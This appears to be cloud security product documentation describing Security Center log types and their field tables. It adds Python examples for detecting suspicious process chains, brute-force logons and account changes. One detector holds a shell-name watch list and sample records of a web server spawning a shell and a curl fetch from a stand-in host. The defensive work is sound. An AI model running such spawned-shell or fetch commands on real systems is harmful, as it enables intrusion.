The log analysis feature of Security Center provides centralized storage, query, and analysis of host activities and security events to facilitate security audits, event tracing, and threat discovery. This topic describes the log types that Security Center supports, the differences between editions, the log fields, and provides query examples.
Supported logs
Subscription
Host logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Security logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Note: Only alerts supported by the Free Edition are recorded. | ||||
Vulnerability logs | Note: Only vulnerabilities supported by the Free Edition are recorded. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Value-added service logs
If you enable the following value-added services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check logs and CSPM logs)
Pay-as-you-go
If you purchase the Host and Container Security pay-as-you-go service, the supported log types vary depending on the protection level that is bound to the server.
Host logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Security logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Note: Only alerts supported for the Unprotected level are recorded. | |||
Vulnerability logs | Note: Only vulnerabilities at the Unprotected level are recorded. | |||
Network defense logs | ||||
Core file monitoring event logs |
Pay-as-you-go service logs
If you enable the following pay-as-you-go services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM (Baseline Check and CSPM logs)
Log type descriptions
The following log samples and field descriptions are for reference only. The specific fields are subject to change with product updates. For the most accurate information, refer to the data collected in Simple Log Service.
Host logs
__topic__: aegis-log-login
Log content: Records user logon events on servers, including the source IP address, username, and logon result.
Description: Helps you monitor user activities and promptly identify and respond to abnormal behavior.
Important: Security Center does not support collecting logon logs for the Windows Server 2008 operating system.
Collection period: Real-time.
__topic__: aegis-log-network
Log content: Records network connection activities on the server in real time, including information such as the connection 5-tuple and associated processes.
Description: Helps you discover abnormal connection behavior, identify potential network attacks, and optimize network performance.
Important: The server collects only some connection statuses from establishment to termination. Inbound traffic is not recorded.
Collection period: Real-time.
__topic__: aegis-log-process
Log content: Records startup events for all new processes on the server, including information such as the process name, command-line parameters, and the parent process.
Description: Helps you understand the startup status and configuration of processes in the system and detect issues such as abnormal process activities, malware intrusions, and security threats.
Collection period: Real-time. Logs are reported immediately after a process starts.
__topic__: aegis-log-crack
Log content: Records brute-force attack behavior, including information about attempts to log on to and crack systems, applications, or accounts.
Description: Helps you identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks. These logs also support event response and forensic analysis.
Collection period: Real-time.
__topic__: aegis-snapshot-host
Log content: Records detailed information about user accounts in a system or application, including basic account properties such as the username, password policy, and logon history.
Description: By comparing snapshots from different points in time, you can monitor account changes and promptly detect security issues such as unauthorized access and abnormal account statuses.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-snapshot-port
Log content: Records network connection information, including the connection 5-tuple, connection status, and associated processes.
Description: Helps you understand the active network connections in your system, discover abnormal connection behavior, and identify potential network attacks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-snapshot-process
Log content: Records process activities in the system, including the process ID, name, and startup time.
Description: Use these logs to understand process activities and resource usage, and detect issues such as abnormal processes, high CPU usage, and memory leaks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__: aegis-log-dns-query
Log content: Records DNS query requests that are initiated by the server, including information such as the queried domain name, query type, and source.
Important: Log collection is not supported for Linux servers with a kernel version earlier than 4.X.X.
Description: Use these logs to analyze DNS activities and detect issues such as abnormal queries, domain hijacking, and DNS pollution.
Collection period: Real-time.
__topic__: aegis-log-client
Log content: Records the online and offline events of the Security Center agent.
Description: Helps you monitor the running status of the Security Center agent.
Collection period: Real-time.
Security logs
All security logs are collected in real time.
__topic__: sas-vul-log
Log content: Records information about vulnerabilities that are found in your systems or applications, including the vulnerability name, status, and handling action.
Description: Helps you understand the vulnerabilities, security risks, and attack trends in your system so that you can take timely remediation measures.
__topic__: sas-hc-log
Log content: Records the results of baseline risk checks, including information such as the baseline level, category, and risk level.
Important: Only the data of check items that fail for the first time is recorded. Data for check items that previously passed but fail a new check is also recorded.
Description: Helps you understand the baseline security status and potential risks of your system.
__topic__: sas-security-log
Log content: Records security events and alerts that occur in your system or application, including the alert data source, details, and alert level.
Description: Helps you understand the security events and threats in your system so that you can take appropriate response measures.
CSPM - Cloud platform configuration check logs
__topic__: sas-cspm-log
Log content: Records information such as cloud platform configuration check results and whitelisting operations.
Description: Helps you understand configuration issues and potential security risks in your cloud platform.
__topic__: sas-net-block
Log content: Records network attack events, including key information such as the attack type and source/destination IP addresses.
Description: Helps you understand security events on your network so that you can take response and defense measures to improve network security.
__topic__: sas-rasp-log
Log content: Records attack alert information from Runtime Application Self-Protection (RASP), including the attack type, behavioral data, and attacker IP address.
Description: Helps you understand security events in your application so that you can take response and defense measures to improve application security.
__topic__: sas-filedetect-log
Log content: Records detection results from the malware detection software development kit (SDK), including file information, detection scenario, and results.
Description: Helps you identify and promptly handle malicious programs in offline files or cloud storage.
Core file monitoring event logs
__topic__: aegis-file-protect-log
Log content: Records alert events that are detected by the core file monitoring feature, including the file path, operation type, and alert level.
Description: Helps you monitor whether core files are stolen or tampered with.
__topic__: sas-agentless-log
Log content: Records security risks that are detected in cloud servers, disk snapshots, and images. These risks include vulnerabilities, baselines, malicious samples, and sensitive files.
Description: Helps you view the security risk status of your assets over different time periods to identify and respond to potential threats.
Host log fields
Logon logs
Field | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | The source IP address for the logon. | 221.11.XX.XX |
dst_port | The logon port of the server. | 22 |
login_type | The logon type. Valid values include but are not limited to: | SSH |
username | The logon username. | admin |
login_count | The number of logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Network connection logs
Field | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values: | in |
dst_ip | The IP address of the network connection receiver. | 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The filename of the parent process. | /usr/bin/bash |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The process name. | nginx |
proc_path | The process path. | /usr/local/nginx/sbin/nginx |
proc_start_time | The startup time of the process. | N/A |
connection_type | The protocol. Valid values: | tcp |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the grandparent process. | containerd-shim |
status | The network connection status. Valid values: | 5 |
type | The type of real-time network connection. Valid values: | listen |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Process startup logs
Field | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
cmd_index | The index of each parameter in the command line. Each pair of indexes indicates the start and end of a parameter. | 0,3,5,8 |
cmdline | The full command line for starting the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name associated with the process. | N/A |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
cwd | The directory where the process is running. | N/A |
proc_name | The process filename. | ipset |
proc_path | The full path of the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The user group. | group1 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The parent process filename. | kube-proxy |
parent_proc_path | The full path of the parent process file. | /usr/local/bin/kube-proxy |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The process startup time. | 2024-08-01 16:45:40 |
parent_proc_start_time | The startup time of the parent process. | 2024-07-12 19:45:19 |
sas_group_name | The asset group of the server in Security Center. | default |
srv_cmd | The command line of the grandparent process. | /usr/bin/containerd |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
uid | The user ID. | 123 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
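The process startup fields above (proc_name, parent_proc_name and the child-first cmd_chain JSON) are enough to build a simple "service process spawned a shell" detector, which is the kind of abnormal process activity the aegis-log-process description refers to. The following is an added example, not Security Center's own code; the records, the shell list, and the service-process list are constructed for illustration, and the cmd_chain layout follows the table's example value (a JSON list of {pid: cmdline} objects, child first).

```python
"""Added example (not Security Center's code): flag process startup log
records where a long-running service process launches a shell, either
directly (parent_proc_name -> proc_name) or further up the cmd_chain."""
import json

# Assumed lists for this example: shells/interpreters worth watching, and
# service processes that should rarely spawn one.
SHELLS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
SERVICE_PARENTS = {"nginx", "httpd", "java", "php-fpm", "tomcat", "mysqld"}

# Constructed process startup records using the field names from the table.
SAMPLE_RECORDS = [
    {   # benign: kube-proxy running ipset, mirroring the table's example values
        "uuid": "host-a", "pid": 14275, "ppid": 14268, "username": "root",
        "proc_name": "ipset", "parent_proc_name": "kube-proxy",
        "cmdline": "ipset list KUBE-6-CLUSTER-IP",
        "cmd_chain": json.dumps([{"14275": "ipset list KUBE-6-CLUSTER-IP"},
                                 {"14268": "/usr/local/bin/kube-proxy"},
                                 {"1": "/usr/lib/systemd/systemd"}]),
    },
    {   # suspicious: web server worker spawning a shell (constructed)
        "uuid": "host-b", "pid": 20311, "ppid": 7107, "username": "www-data",
        "proc_name": "bash", "parent_proc_name": "nginx",
        "cmdline": "bash -c id",
        "cmd_chain": json.dumps([{"20311": "bash -c id"},
                                 {"7107": "nginx: worker process"},
                                 {"7100": "nginx: master process nginx"}]),
    },
    {   # suspicious only via the chain: java -> sh -> curl (constructed)
        "uuid": "host-c", "pid": 30001, "ppid": 30000, "username": "app",
        "proc_name": "curl", "parent_proc_name": "sh",
        "cmdline": "curl http://example.invalid/x",
        "cmd_chain": json.dumps([{"30001": "curl http://example.invalid/x"},
                                 {"30000": "sh -c curl http://example.invalid/x"},
                                 {"29990": "/usr/bin/java -jar app.jar"}]),
    },
]


def parse_cmd_chain(chain_json):
    """Turn the cmd_chain JSON (list of {pid: cmdline}, child first) into a
    list of (pid, cmdline) tuples."""
    chain = []
    for entry in json.loads(chain_json):
        for pid, cmdline in entry.items():
            chain.append((int(pid), cmdline))
    return chain


def basename_of(cmdline):
    """Program name from a command line: '/usr/bin/java -jar x' -> 'java',
    'nginx: worker process' -> 'nginx'."""
    tokens = cmdline.split()
    first = tokens[0] if tokens else ""
    return first.rsplit("/", 1)[-1].rstrip(":")


def find_service_to_shell(record):
    """Return (service, shell) if a service process anywhere in the chain has
    a shell as its direct child, else None. chain[i] is the child of chain[i+1]."""
    chain = parse_cmd_chain(record["cmd_chain"])
    for child, parent in zip(chain, chain[1:]):
        child_name, parent_name = basename_of(child[1]), basename_of(parent[1])
        if child_name in SHELLS and parent_name in SERVICE_PARENTS:
            return (parent_name, child_name)
    return None


def detect(records):
    """Return a list of (uuid, pid, reason) for suspicious startups."""
    findings = []
    for rec in records:
        # Cheap check on the flattened parent/child fields first.
        if rec["proc_name"] in SHELLS and rec["parent_proc_name"] in SERVICE_PARENTS:
            findings.append((rec["uuid"], rec["pid"],
                             f"{rec['parent_proc_name']} spawned {rec['proc_name']}"))
            continue
        # Otherwise walk the whole chain for a service -> shell hop.
        hit = find_service_to_shell(rec)
        if hit:
            findings.append((rec["uuid"], rec["pid"],
                             f"{hit[0]} spawned {hit[1]} earlier in the chain"))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_RECORDS):
        print(finding)
```

Checking the whole chain matters because the flattened fields only show one hop: the third record looks like an ordinary `sh -> curl` until the chain reveals the shell was itself started by the Java service.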
Brute-force attack logs
Field | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is subject to brute-force attacks. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server that is subject to brute-force attacks. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
src_ip | The source IP address for the logon. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values: | SSH |
username | The logon username. | user |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
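The brute-force attack logs and the logon logs share uuid, src_ip, username and start_time, so the two can be joined: a logon that follows a burst of merged failures (login_count) from the same source against the same server is the event an analyst wants first. The following is an added example, not Security Center's own code. The records, the 10-minute window and the failure threshold are constructed assumptions; it treats each brute-force record's login_count as failed attempts and each logon record as a recorded logon, as the two tables describe them.

```python
"""Added example (not Security Center's code): flag logons preceded by a
burst of brute-force failures from the same source IP on the same server."""
from collections import defaultdict

WINDOW_SECONDS = 600      # look-back window; an assumption for this example
FAILURE_THRESHOLD = 10    # failed attempts needed to flag; also an assumption

# Constructed brute-force attack log records (login_count = merged failures).
BRUTE_FORCE_LOGS = [
    {"uuid": "srv-1", "src_ip": "47.92.0.10", "username": "root",
     "login_type": "SSH", "login_count": 3, "start_time": 1719472100},
    {"uuid": "srv-1", "src_ip": "47.92.0.10", "username": "root",
     "login_type": "SSH", "login_count": 9, "start_time": 1719472160},
    {"uuid": "srv-1", "src_ip": "47.92.0.10", "username": "admin",
     "login_type": "SSH", "login_count": 5, "start_time": 1719472200},
    {"uuid": "srv-2", "src_ip": "203.0.113.7", "username": "root",
     "login_type": "SSH", "login_count": 2, "start_time": 1719470000},
]

# Constructed logon log records.
LOGON_LOGS = [
    # same source that just produced 17 failures on srv-1: flag
    {"uuid": "srv-1", "src_ip": "47.92.0.10", "username": "root",
     "login_type": "SSH", "login_count": 1, "start_time": 1719472214},
    # admin logon from an internal address with no failures: no flag
    {"uuid": "srv-1", "src_ip": "192.168.1.5", "username": "admin",
     "login_type": "SSH", "login_count": 1, "start_time": 1719472300},
    # srv-2: the failures are outside the window and too few: no flag
    {"uuid": "srv-2", "src_ip": "203.0.113.7", "username": "root",
     "login_type": "SSH", "login_count": 1, "start_time": 1719472500},
]


def index_failures(brute_force_logs):
    """Group failure records by (uuid, src_ip) so look-ups are cheap."""
    by_key = defaultdict(list)
    for rec in brute_force_logs:
        by_key[(rec["uuid"], rec["src_ip"])].append(rec)
    return by_key


def failures_before(failure_index, uuid, src_ip, logon_time, window=WINDOW_SECONDS):
    """Sum login_count of failures from src_ip against uuid inside the window
    that ends at logon_time. Failures against any username count, since a
    spray often rotates usernames before one succeeds."""
    total = 0
    for rec in failure_index.get((uuid, src_ip), []):
        if logon_time - window <= rec["start_time"] <= logon_time:
            total += rec["login_count"]
    return total


def flag_logons_after_bruteforce(logon_logs, brute_force_logs,
                                 threshold=FAILURE_THRESHOLD):
    """Return (uuid, src_ip, username, failures_in_window) for each logon
    preceded by at least `threshold` failed attempts from the same source."""
    failure_index = index_failures(brute_force_logs)
    hits = []
    for logon in logon_logs:
        n = failures_before(failure_index, logon["uuid"], logon["src_ip"],
                            logon["start_time"])
        if n >= threshold:
            hits.append((logon["uuid"], logon["src_ip"], logon["username"], n))
    return hits


if __name__ == "__main__":
    for hit in flag_logons_after_bruteforce(LOGON_LOGS, BRUTE_FORCE_LOGS):
        print("logon after brute force:", hit)
```

The same join expressed over the two __topic__ values (aegis-log-crack and aegis-log-login) in a Simple Log Service query is the usual next step once the threshold has been tuned on real data; the window and threshold here are starting points, not recommendations.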
Account snapshot logs
Field | Description | Example |
account_expire | The expiration time of the account. never indicates that the account never expires. | never |
domain | The domain or directory service to which the account belongs. N/A indicates that the account does not belong to any domain. | N/A |
groups | The group to which the account belongs. N/A indicates that the account does not belong to any group. | ["nscd"] |
home_dir | The home directory. This is the default location for storing and managing files in the system. | /Users/abc |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon to the account. N/A indicates that the account has never been logged on to. | 2023-08-18 09:21:21 |
login_ip | The remote IP address of the last logon to the account. N/A indicates that the account has never been logged on to. | 192.168.XX.XX |
passwd_expire | The expiration date of the password. never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values: | 0 |
sas_group_name | The asset group of the server in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the user account. Valid values: | 0 |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
username | The username. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date for the password expiration reminder. never indicates that a reminder is never sent. | 2024-08-20 |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
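The aegis-snapshot-host description says the value of these snapshots comes from comparing them over time. The following added example (not Security Center's own code) diffs two constructed snapshots of the same server keyed by (uuid, username) and reports added, removed and changed accounts, then picks out the accounts whose perm field changed from 0. The page does not list the valid values of perm, so treating 0 as "no root permissions" and any other value as root is an assumption of this example.

```python
"""Added example (not Security Center's code): diff two account snapshot
logs for one server and surface new accounts and permission changes."""

# Constructed snapshot from the earlier collection run.
SNAPSHOT_T0 = [
    {"uuid": "srv-1", "username": "root", "perm": 1, "shell": "/bin/bash",
     "groups": ["root"], "passwd_expire": "never", "status": 0},
    {"uuid": "srv-1", "username": "nscd", "perm": 0, "shell": "/sbin/nologin",
     "groups": ["nscd"], "passwd_expire": "never", "status": 0},
    {"uuid": "srv-1", "username": "deploy", "perm": 0, "shell": "/bin/bash",
     "groups": ["deploy"], "passwd_expire": "2024-08-24", "status": 0},
]

# Constructed later snapshot: deploy gained root and a new group, an account
# with a login shell appeared, and nscd is gone.
SNAPSHOT_T1 = [
    {"uuid": "srv-1", "username": "root", "perm": 1, "shell": "/bin/bash",
     "groups": ["root"], "passwd_expire": "never", "status": 0},
    {"uuid": "srv-1", "username": "deploy", "perm": 1, "shell": "/bin/bash",
     "groups": ["deploy", "wheel"], "passwd_expire": "2024-08-24", "status": 0},
    {"uuid": "srv-1", "username": "svc_backup", "perm": 0, "shell": "/bin/bash",
     "groups": ["backup"], "passwd_expire": "never", "status": 0},
]

# Snapshot fields whose change is worth reporting.
WATCHED_FIELDS = ("perm", "shell", "groups", "passwd_expire", "status")


def by_account(snapshot):
    """Index snapshot records by (uuid, username)."""
    return {(r["uuid"], r["username"]): r for r in snapshot}


def diff_snapshots(before, after):
    """Return {'added': [...], 'removed': [...], 'changed': {key: {field: (old, new)}}}."""
    old, new = by_account(before), by_account(after)
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = {}
    for key in set(old) & set(new):
        deltas = {f: (old[key][f], new[key][f]) for f in WATCHED_FIELDS
                  if old[key][f] != new[key][f]}
        if deltas:
            changed[key] = deltas
    return {"added": added, "removed": removed, "changed": changed}


def privilege_escalations(diff):
    """Accounts whose perm went from 0 to something else (assumption: non-zero
    means root, since the page gives no value list for perm)."""
    return sorted(key for key, deltas in diff["changed"].items()
                  if "perm" in deltas and deltas["perm"][0] == 0
                  and deltas["perm"][1] != 0)


def new_accounts_with_login_shell(diff, after):
    """New accounts that can log in interactively (shell not nologin/false)."""
    new = by_account(after)
    return [key for key in diff["added"]
            if not new[key]["shell"].endswith(("nologin", "false"))]


if __name__ == "__main__":
    d = diff_snapshots(SNAPSHOT_T0, SNAPSHOT_T1)
    print("added:", d["added"], "removed:", d["removed"])
    print("changed:", d["changed"])
    print("escalations:", privilege_escalations(d))
    print("new login-capable accounts:", new_accounts_with_login_shell(d, SNAPSHOT_T1))
```

Because snapshots are collected on the Asset Fingerprints interval (once a day by default), a change seen here can be up to a day old; the real-time logon and process startup logs are where to look for what happened in between.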
Network snapshot logs
Field | Description | Example |
net_connect_dir | The direction of the network connection. Valid values: | in |
dst_ip | The IP address of the network connection receiver. | 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The process ID. | 682 |
proc_name | The process name. | sshd |
connection_type | The protocol. Valid values: | tcp4 |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The network connection status. Valid values: | 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Process snapshot logs
Field | Description | Example |
cmdline | The full command line for starting the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash of the binary file. Note: The MD5 hash is not calculated for process files larger than 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The process filename. | assist_daemon |
proc_path | The full path of the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The process ID. | 1692 |
pname | The parent process filename. | systemd |
sas_group_name | The asset group of the server in Security Center. | default |
proc_start_time | The process startup time. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
DNS request logs
Field | Description | Example |
domain | The domain name corresponding to the DNS request. | example.aliyundoc.com |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiated the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiated the DNS request. | 3544 |
ppid | The ID of the parent process that initiated the DNS request. | 3408 |
cmd_chain | The process chain that initiated the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line that initiated the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path of the process that initiated the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group of the server in Security Center. | default |
time | The time when the DNS request event was captured. This time is generally the same as the time when the DNS request occurred. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiated the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Agent event logs
Field | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The agent version. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The operating system type. Valid values: | linux |
region_id | The ID of the region where the server resides. | cn-beijing |
status | The agent status. Valid values: | online |
start_time | The start timestamp in seconds. This also indicates the time of the event occurrence. | 1719472214 |
Security log fields
Vulnerability logs
Field | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values: | later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
instance_name | The hostname. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The action performed on the vulnerability. Valid values: | new |
status | The status. Valid values: | 1 |
tag | The tag of the vulnerability. Valid values: | oval |
type | The vulnerability type. Valid values: | sys |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
CSPM - Baseline check logs
Field | Description | Example |
check_item_name | The name of the check item. | Set minimum interval for password changes |
check_item_level | The check level of the baseline. Valid values: | medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
risk_level | The level of the risk item. Valid values: | medium |
operation | The operation. Valid values: | new |
risk_name | The name of the risk item. | Password policy compliance check |
sas_group_name | The asset group of the server on which the risk item is detected in Security Center. | default |
status | The status. Valid values: | 1 |
sub_type_alias_name | The alias of the subtype. | International security best practices - Ubuntu 16/18/20/22 security baseline check |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the type. | International security best practices |
type_name | The baseline type. For more information about the valid values of the baseline type, see List of baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security alert logs
Field | Description | Example |
data_source | The data source. Valid values: | aegis_login_log |
detail | A JSON object that provides detailed context for the alert. The fields in this object vary based on the alert type. The following describes common fields of the | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
level | The risk level of the alert event. Valid values: | suspicious |
name | The alert name. | Anomalous Logon - Unusual Account Logon to ECS |
operation | The operation. Valid values: | new |
status | The status of the alert. Valid values: | 1 |
unique_info | The unique identifier of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server that generated the alert. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
suspicious_event_id | The alert event ID. | 650226318 |
handle_time | The time corresponding to the operation. | 1765272845 |
alert_first_time | The time when the alert first occurred. | 1764226915 |
alert_last_time | The time when the alert last occurred. | 1765273425 |
strict_type | Indicates whether the alert is a strict mode alert. Valid values: true, false. | |
user_id | The account ID. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Field | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to obtain the ID. | 11 |
check_item_name | The name of the check item. | Origin fetch configuration |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
instance_name | The instance name. | lsm |
